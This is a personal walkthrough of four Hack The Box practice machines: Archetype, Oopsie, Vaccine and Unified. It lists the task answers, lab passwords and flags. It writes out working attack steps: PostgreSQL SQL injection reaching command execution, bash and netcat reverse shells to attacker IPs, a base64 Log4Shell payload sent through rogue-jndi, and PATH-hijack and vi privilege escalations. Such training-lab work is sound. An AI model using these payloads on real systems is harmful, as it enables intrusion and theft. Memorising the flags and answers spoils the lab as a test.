# Tier 0    # Tier 1      # Tier 2 ## Archetype ### Task 1: Which TCP port is hosting a database server? Using commandline `nmap -A —top-ports 1000 10.129.95.187 -T 4 -vv` to scan port. The result like that:  **A: 1433** ### Task 2: What is the name of the non-Administrative share available over SMB? Using `smbclient` to connect to the samba file server and drive transactions from the terminal. `smbclient -L \\10.129.134.197` With option `-L`, it means list all shared resources in the server for this IP address.  **A: backups** ### Task 3: What is the password identified in the file on the SMB share? After connected to the server by using user `backups`, listing all file and downloading the file.  I cat this file and got the password (from the database configurations file). **A: M3g4c0rp123** ### Task4: What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server? **A: mssqlclient.py** Install the `Impacket`  Check if it has been installed successfully.  ### Task 5: What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell? Searching on google:  Try it out on my terminal.  **A: enable_xp_cmdshell** ### Task 6: What script can be used in order to search possible paths to escalate privileges on Windows hosts Searching on google:  **A: WinPEAS** ### Task 7: What file contains the administrator's password?  Listening in port 4444 to get revershell My ip is `10.10.16.38`, then I used the `[Reverse Shell generator](https://www.revshells.com/)` to get power shell command line.  After run like this:  We get the shell.  Download `WinPEAS` from https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS I will host the local server, target machine will download winpeas from my server and run it, then, I can exploit target machine.   Result:  A: **ConsoleHost_history.txt** ### Submit user flag Get content of previous file  Using srcip `psexec.py` in Impacket collection to RCE for windows machine with the user and password. Check all directories and files in Users. I found the file that has user flag in `C:/Users/sql_svc/user.txt`  **A: 3e7b102e78218e935bf3f4951fec21a3** ### Submit root flag Similar to the previous case, I found the root flag under the Administrator user. **A: b91ccec3305e98240082d4474b848528**   ## Oopsie ### Task 1: With what kind of tool can intercept web traffic? **A: proxy** ### Task 2: What is the path to the directory on the webserver that returns a login page? Check source code of main page  I can see a link source script of login page: **A: /cdn-cgi/login** ### Task 3: What can be modified in Firefox to get access to the upload page? **A: cookie** ### Task 4: What is the access ID of the admin user? First, log in as guest. Url of this account is `http://10.129.61.177/cdn-cgi/login/admin.php?content=accounts&id=2` Guessing by changing in the parameter id to 1 to try  **A: 34322** ### Task 5: On uploading a file, what directory does that file appear in on the server? Changing the access ID in cookie to access ID of admin, to get admin privileges.  Using gobuster with directory/file enumeration mode to list all dir or files.   **A: /uploads** ### Task 6: What is the file that contains the password that is shared with the robert user? Noticed that this website uses PHP as the backend programming language. So, we can assume that uploading something of PHP shell can get access into system. Create code PHP to reverse shell from target machine.  Listening in port 4444...  Upload file shell code to website.     Check dir `/var/www/html` ( It is the default location for storing website files that are served to users over the web.) I found file `db.php` that contains robert password.  `A: db.php` ### Task 7: What executible is run with the option "-group bugtracker" to identify all files owned by the bugtracker group?  I found a post in StackExchange.  `A: find` ### Task 8: Regardless of which user starts running the bugtracker executable, what's user privileges will use to run? Using command line `ls -la` in /usr/bin directory.  **A: root** ### Task 9: What SUID stands for?  **A: Set owner User ID** ### Task 10: What is the name of the executable being called in an insecure manner? Identified user `robert` belongs to group `bugtracker`, and user of this group can execute file binary `bugtracker`.  Using `python3 -c 'import pty; pty.spawn("/bin/bash")'` to upgrade the reverse shell to terminal Run file 'bugtracker', provide some id from 1 to 4, when id=4:  We can see that the 'cat' command is executed without root privileges. ### Submit user flag  **A: f2c74ee8db7983851ab2a96a44eb7981** ### Submit root flag  Can't access to root. ``` cd /tmp/ echo '/bin/sh' > cat chmod +x cat export PATH=/tmp:$PATH /usr/bin/bugtracker ```  **A: af13b0bee69f8a877c3faf667f7beacf**  ## Vaccine ### Task 1: **Besides SSH and HTTP, what other service is hosted on this box?** Using `nmap` to scan top common ports by following command in the picture, the result found 3 port 21/tcp → FTP, 22/tcp → SSH, 80/tcp → HTTP.  **A: FTP** ### Task 2: **This service can be configured to allow login with any password for specific username. What is that username?** In Nmap’s result, the FTP service show that `ftp-anon: Anonymous FTP login allowed` , it means user `anonymous` can login without the password **A: anonymous** ### Task 3: **What is the name of the file downloaded over this service?** Also in Nmap’s result, we can see a file zip with name `backup.zip` **A: backup.zip** ### Task 4: **What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?** **A: zip2john** ### Task 5: **What is the password for the admin user on the website?** Download file backup from FTP server.  Using the [john the ripper](https://github.com/openwall/john) to crack password youtube link: https://www.youtube.com/watch?v=KzD1xxVt4cg&t=838s  Extracting this file zip, then read the `index.php` , we can see the session_start like this:  crack md5 hash to get the password  **A: qwerty789** ### Task 6: **What option can be passed to sqlmap to try to get command execution via the sql injection?** **A: --os-shell**  ### Task 7: **What program can the postgres user run as root using sudo?** Log in as admin user with password in Task 5  Get cookie to use the sqlmap  Because I could not use sqlmap to get shell, i exploit the sql injection manually. Get table informations by `http://10.129.60.96/dashboard.php?search=%27%20UNION%20ALL%20SELECT%201,TABLE_NAME,table_schema,null,null%20FROM%20information_schema.tables;%20--a` Following the tutorial of RCE in PostgreSQL injection `meta'; CREATE TABLE cmd_exec (cmd_output text);--a`  `meta'; COPY cmd_exec FROM PROGRAM 'id';--a`  `' UNION ALL SELECT null, cmd_exec.cmd_output,null,null,null FROM cmd_exec; --a`  `meta'; COPY cmd_exec FROM PROGRAM 'cat /etc/passwd';--a`  Reverse shell: Listening on port 4444 `/bin/bash -i >& /dev/tcp/10.10.16.38/4444 0>&1`  But happened error, change to another method Using nc-mknod: `rm /tmp/l;mknod /tmp/l p;/bin/sh 0</tmp/l | nc <your_ip> <your_port> 1>/tmp/l'` Encode url And GET: (changed IP and Port) `http://10.129.95.174/dashboard.php?search=meta%27%20;%20COPY%20cmd_exec%20FROM%20PROGRAM%20%27rm%20%2Ftmp%2Fl%3Bmknod%20%2Ftmp%2Fl%20p%3B%2Fbin%2Fsh%200%3C%2Ftmp%2Fl%20|%20nc%2010.10.16.4%204444%201%3E%2Ftmp%2Fl%27;--a` ``` python3 -c 'import pty; pty.spawn("/bin/bash")' ```   Check `sudo -l` but need password of postgre user   `http://10.129.60.96/dashboard.php?search=' UNION ALL SELECT 1,pg_user.usename,pg_user.passwd,null,null FROM pg_user ; --a`  So, i check `pg_shadow` instead of `pg_user`  Crack hashed MD5 password, I got raw password for this user.  Perform reverse shell again and check sudo -l with password: `P@s5w0rd!`  **A: vi** ### User flag  **A: ec9b13ca4d6229cd5cc1e09980965bf7** ### Root flag Get root privileges:  ``` sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf :!/bin/bash ```  **A: dd6e058e814260bc70e9bbdef2715849**  References: https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection https://book.hacktricks.xyz/pentesting-web/sql-injection/postgresql-injection https://github.com/cwinfosec/revshellgen/blob/master/revshellgen.py ## Unified ### Task 1. Which are the first four open ports?  **A: 22,6789,8080,8443** ### Task 2. What is the title of the software that is running running on port 8443?  **A: UniFi Network** ### Task 3. What is the version of the software that is running?  **A: 6.4.54** ### Task 4. What is the CVE for the identified vulnerability? Research this Web application and its version, I found the article about Log4j vulnerabilities in Unifi software that uses 6.4.54 version. Versions prior to 6.5.54 are vulnerable to remote code execution. References: https://www.sprocketsecurity.com/resources/another-log4j-on-the-fire-unifi https://github.com/puzzlepeaches/Log4jUnifi **A: CVE-2021-44228** ### Task 5. What protocol does JNDI leverage in the injection? JNDI – Java Naming and Directory Interface is a Java API that allows the application developer to retrieve objects based on a given name. JNDI supports different implementations like Remote Method Invocation (RMI), Lightweight Directory Access Protocol (LDAP) and others. **A: LDAP** ### Task 6. What tool do we use to intercept the traffic, indicating the attack was successful? **A: tcmdump** ### Task 7. What port do we need to inspect intercepted traffic for? Using google search about port of LDAP service.  **A: 389** ### Task 8. What port is the MongoDB service running on? First, installing the tool from git repo: [GitHub GitHub - veracode-research/rogue-jndi: A malicious LDAP serv…](https://github.com/veracode-research/rogue-jndi) > Make sure you have Maven and Java installed before attempting to compile this tool. > By `sudo apt install openjdk-17-jdk` and `sudo apt install maven` One-line command to build ```bash git clone https://github.com/veracode-research/rogue-jndi && cd rogue-jndi && mvn package ``` Send request to login with remember value in content:  The command line to create a reverse shell using Bash and encode base64 ```bash echo 'bash -c "bash -i >& /dev/tcp/<ip_attacker>/<port_attacker> 0>&1"' | base64 ``` Start rogue-jndi LDAP server up by following command ```bash java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTcyLjMxLjIyMS4xNjEvNDQ0NCAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "<ip_attacker>" ```  Listening on port 4444 and send request again   **A: 27117** ### Task 9: What is the default database name for UniFi applications? **A: ace** ### Task 10: What is the function we use to enumerate users within the database in MongoDB?  **A: db.admin.find()** ### Task 11: What is the function we use to update users within the database in MongoDB? **A: db.admin.update()** ### Task 12: What is the password for the root user? Following the tutorial:  The password hashes shadow for admin account is: `$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.` Using john-the-ripper to crack hash  choose another password and hash sha-512 algo:  Using command to update password ```bash mongo --port 27117 ace --eval 'db.admin.insert({ "email" : "winndy112@localhost.local", "last_site_name" : "default", "name" : "unifi-admin", "time_created" : NumberLong(100019800), "x_shadow" : "$6$arQSCCzNOg.PZvSN$TVuOE0YObPs0ZD.w40lCIACyly01gt6Md8buE3s0Aao6ltVXtYmPicdRBQTEsNhy1AZaKhGKeHP0UeOizhaTR." })' ```   **A: NotACrackablePassword4U2022** Get user flag and root flag  ### Submit user flag **HTB{6ced1a6a89e666c0620cdb10262ba127}** ### Submit root flag **HTB{e50bc93c75b634e4b272d2f771c33681}**  References: https://www.sprocketsecurity.com/resources/another-log4j-on-the-fire-unifi